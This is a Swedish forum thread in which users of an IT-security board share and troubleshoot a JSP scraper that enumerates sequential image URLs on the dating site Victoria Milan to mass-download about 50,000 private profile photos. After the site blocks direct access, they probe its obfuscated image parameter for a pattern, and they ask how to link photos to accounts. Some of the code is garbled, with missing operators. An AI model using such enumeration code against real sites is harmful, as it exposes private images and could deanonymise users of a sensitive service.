1. Dator och IT
  2. IT-säkerhet

Komma åt bilder på Victoria Milan?

Svara
  • 1
  • 2
2011-03-14, 16:13
  #1
Brygghasten
Medlem
Ber om ursäkt ifall tråden ligger fel eller redan existerar, jag har verkligen sökt.

Se nedan.

http://www.aftonbladet.se/wendela/article8710861.ab

Det står att problemet åtgärdats. Kan någon bekräfta detta? Samt, är det någon som hunnit tagit ut bilder därifrån? Topplessbilder utlovas ju till och med!
Citera
2011-03-14, 18:58
  #2
Jasin
Medlem
Jahapp, taskigt för dem som lagt ut sig och sina bilder. Den enes dumhet blir mitt helgnöje.

Men OT: Tror det låt på 4chan, men kan vara ganska svårt att få tillbaks det där ifrån. Testa att starta en tråd där
Citera
2011-03-14, 21:58
  #3
Tribalmaster
Medlem
Tribalmasters avatar
Iggen som lyckats knäcka det och kan lägga upp det som en rar.fil...?
Citera
2011-03-16, 09:58
  #4
HappySatan
Medlem
Jag har knåpat ihop en liten java-app som kan hämta hem alla bilder (ca 50000, ~1gb)
Tänkte inte ladda upp dem här - det blir väl någon slags upphovsrättsbrott, men kan dela med mig av koden jag använder för att ladda ner bilderna.

Javakod, använd Netbeans bundled med Tomcat för att köra
Kod:
<%@page import="java.io.FileOutputStream"%>
<%@page import="java.io.FileWriter"%>
<%@page import="java.io.File"%>
<%@page import="java.io.InputStreamReader"%>
<%@page import="java.io.Reader"%>
<%@page import="java.io.BufferedInputStream"%>
<%@page import="java.io.InputStream"%>
<%@page import="java.net.URLConnection"%>
<%@page import="java.net.URL"%>
<%
    for(int x 200;x<54000;x++) { //Finns fler bilder, men efter ~54000 börjar en unik nyckel att användas
        try {
            String folderName ""+((x/1000)+1);

            String urlStr "http://www.victoriamilan.com/files/profile/" folderName "/l_" ".jpg";

            URL url = new URL(urlStr);
            URLConnection urlConn url.openConnection();
            InputStream rawData urlConn.getInputStream();

            File file = new File("C:\\Users\\Public\\Pictures\\VictoriaMilanDownload\\test\\l"+x+".jpg");
            FileOutputStream fStream = new FileOutputStream(file);
            byte buf[]=new byte[1024];
            int len;
            while((len=rawData.read(buf))>0) {
                fStream.write(buf,0,len);
            }
            fStream.close();
            rawData.close();
        }catch(Exception e) {
            System.err.println(e);
        }
    }
%> 

För att köra följande kod
- Ladda ner Java JDK http://www.oracle.com/technetwork/ja...ads/index.html
- Ladda ner Netbeans för Java: http://netbeans.org/downloads/start....en&option=java
- Installera Java JDK
- Installera Netbeans, välj bort Glassfish och lägg till Apache Tomcat
- Skapa ett nytt Web projekt
- Kopiera in koden ovan i en ny JSP-fil
- Högerklicka och välj "run" på filen (bilderna sparas i C:\\Users\\Public\\Pictures\\VictoriaMilanDownload \\test\\ om du inte ändrar i koden)
__________________
Senast redigerad av HappySatan 2011-03-16 kl. 10:05.
Citera
2011-03-17, 12:29
  #5
Dunning-Kruger
Medlem
Citat:
Ursprungligen postat av HappySatan
För att köra följande kod
- Ladda ner Java JDK http://www.oracle.com/technetwork/ja...ads/index.html
- Ladda ner Netbeans för Java: http://netbeans.org/downloads/start....en&option=java
- Installera Java JDK
- Installera Netbeans, välj bort Glassfish och lägg till Apache Tomcat
- Skapa ett nytt Web projekt
- Kopiera in koden ovan i en ny JSP-fil
- Högerklicka och välj "run" på filen (bilderna sparas i C:\\Users\\Public\\Pictures\\VictoriaMilanDownload \\test\\ om du inte ändrar i koden)

Filen står bara och tuggar men ingenting sparas.
__________________
Senast redigerad av Dunning-Kruger 2011-03-17 kl. 13:21. Anledning: Prenumerationstillägg
Citera
2011-03-17, 13:43
  #6
HappySatan
Medlem
Om du går in i Netbeans och kikar i fönstret Output - > Apache Tomcat 6.0.**
Står det något felmeddelande där?

Står det:
java.io.FileNotFoundException: C:\Users\Public\Pictures\VictoriaMilanDownload\tes t\l9575.jpg (Det går inte att hitta sökvägen)

I så fall finns inte mappen som bilderna ska sparas till.
Citera
2011-03-17, 13:49
  #7
Dunning-Kruger
Medlem
Citat:
Ursprungligen postat av HappySatan
Om du går in i Netbeans och kikar i fönstret Output - > Apache Tomcat 6.0.**
Står det något felmeddelande där?

Står det:
java.io.FileNotFoundException: C:\Users\Public\Pictures\VictoriaMilanDownload\tes t\l9575.jpg (Det går inte att hitta sökvägen)

I så fall finns inte mappen som bilderna ska sparas till.

Det var nog det jag hade missat för nu fungerar det.
Går det att koppla bild till user på VM?
Citera
2011-03-17, 20:01
  #8
ExtraAllt
Medlem
ExtraAllts avatar
Citat:
Ursprungligen postat av HappySatan
Om du går in i Netbeans och kikar i fönstret Output - > Apache Tomcat 6.0.**
Står det något felmeddelande där?

Står det:
java.io.FileNotFoundException: C:\Users\Public\Pictures\VictoriaMilanDownload\tes t\l9575.jpg (Det går inte att hitta sökvägen)

I så fall finns inte mappen som bilderna ska sparas till.


Jag har samma problem med det står:
java.io.IOException: Server returned HTTP response code: 403 for URL: http://www.victoriamilan.com/files/p...17/l_16850.jpg

Vad är det för problem då?
Citera
2011-03-17, 21:36
  #9
sneakie
Medlem
när kommer bilderna i en rar då?
Citera
2011-03-17, 23:17
  #10
HappySatan
Medlem
Tillägg
Citat:
Ursprungligen postat av ExtraAllt
Jag har samma problem med det står:
java.io.IOException: Server returned HTTP response code: 403 for URL: http://www.victoriamilan.com/files/p...17/l_16850.jpg

Vad är det för problem då?

Det verkar som att VictoriaMilan "äntligen" höjt säkerheten för sina bilder.
Går inte längre att ladda ner dem direkt som tidigare, utan bilderna döljs nu bakom in image.php som strömmar ut rätt bild..

En url ser nu ut "http://www.victoriamilan.com/scripts/img.php?str=AyMAegAmQDJSIA==&gender=female&mode=l_ "

Ska testa om jag hittar något system bakom "str=AyMAegAmQDJSIA"-delen,men det ser mer tveksamt ut. Är sannolikt en hyffsat random sträng som gör det mer eller mindre omöjligt att tanka ner bilderna på samma sätt som tidigare.

[Tillagt senare]
Verkar fortfarande vara relativt låg säkerhet på servern...
str=AyMAegAmQDJSIA till AyMAegAmQDJSIP visar samma bild
str=AyMAegAmQDJSIP till AyMAegAmQDJSIZ visar samma bild
str=AyMAegAmQDJSJA till AyMAegAmQDJSJP visar samma bild
str=AyMAegAmQDJSJQ till AyMAegAmQDJSJZ visar samma bild

..dvs verkar det bara vara någon slags alfabetisk räknare IA, IQ, JA, JQ, KA, KQ, osv.. Borde således bli ganska lätt att loopa ut alla bilder.

Och till säkerhetsteamer på VM säger jag bara fy skäms. Slumpmässig URL är det enda som är någorlunda säkert om man vill hålla URL:er privata.

[Ännu senare]
KA och KQ fanns dock inte. Kanske aningen svårare att hitta rätt algoritm än vad jag hoppats på. Well. Slutsnokat för idag. Får se om jag orkar bita i det imorgon
__________________
Senast redigerad av HappySatan 2011-03-17 kl. 23:27.
Citera
2011-03-18, 15:45
  #11
Dawnrider
Medlem
Dawnriders avatar
Någon borde ha laddat ner alla bilder och gjort en torrent av dem? Hittar dock inte.

Chansen är att när de väl upptäckt det här säkerhetshålet så måste man hitta ett helt annat, om de inte är helt sanslöst inkompetenta.
Citera
2011-03-18, 17:08
  #12
king9
Medlem
Citat:
Ursprungligen postat av HappySatan
Jag har knåpat ihop en liten java-app som kan hämta hem alla bilder (ca 50000, ~1gb)
Tänkte inte ladda upp dem här - det blir väl någon slags upphovsrättsbrott, men kan dela med mig av koden jag använder för att ladda ner bilderna.

Javakod, använd Netbeans bundled med Tomcat för att köra
Kod:
<%@page import="java.io.FileOutputStream"%>
<%@page import="java.io.FileWriter"%>
<%@page import="java.io.File"%>
<%@page import="java.io.InputStreamReader"%>
<%@page import="java.io.Reader"%>
<%@page import="java.io.BufferedInputStream"%>
<%@page import="java.io.InputStream"%>
<%@page import="java.net.URLConnection"%>
<%@page import="java.net.URL"%>
<%
    for(int x 200;x<54000;x++) { //Finns fler bilder, men efter ~54000 börjar en unik nyckel att användas
        try {
            String folderName ""+((x/1000)+1);

            String urlStr "http://www.victoriamilan.com/files/profile/" folderName "/l_" ".jpg";

            URL url = new URL(urlStr);
            URLConnection urlConn url.openConnection();
            InputStream rawData urlConn.getInputStream();

            File file = new File("C:\\Users\\Public\\Pictures\\VictoriaMilanDownload\\test\\l"+x+".jpg");
            FileOutputStream fStream = new FileOutputStream(file);
            byte buf[]=new byte[1024];
            int len;
            while((len=rawData.read(buf))>0) {
                fStream.write(buf,0,len);
            }
            fStream.close();
            rawData.close();
        }catch(Exception e) {
            System.err.println(e);
        }
    }
%> 

För att köra följande kod
- Ladda ner Java JDK http://www.oracle.com/technetwork/ja...ads/index.html
- Ladda ner Netbeans för Java: http://netbeans.org/downloads/start....en&option=java
- Installera Java JDK
- Installera Netbeans, välj bort Glassfish och lägg till Apache Tomcat
- Skapa ett nytt Web projekt
- Kopiera in koden ovan i en ny JSP-fil
- Högerklicka och välj "run" på filen (bilderna sparas i C:\\Users\\Public\\Pictures\\VictoriaMilanDownload \\test\\ om du inte ändrar i koden)




tufft om de funkar, ska prova ladda ner :P
men hur användar man programet ?
Citera
Svara
  • 1
  • 2

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in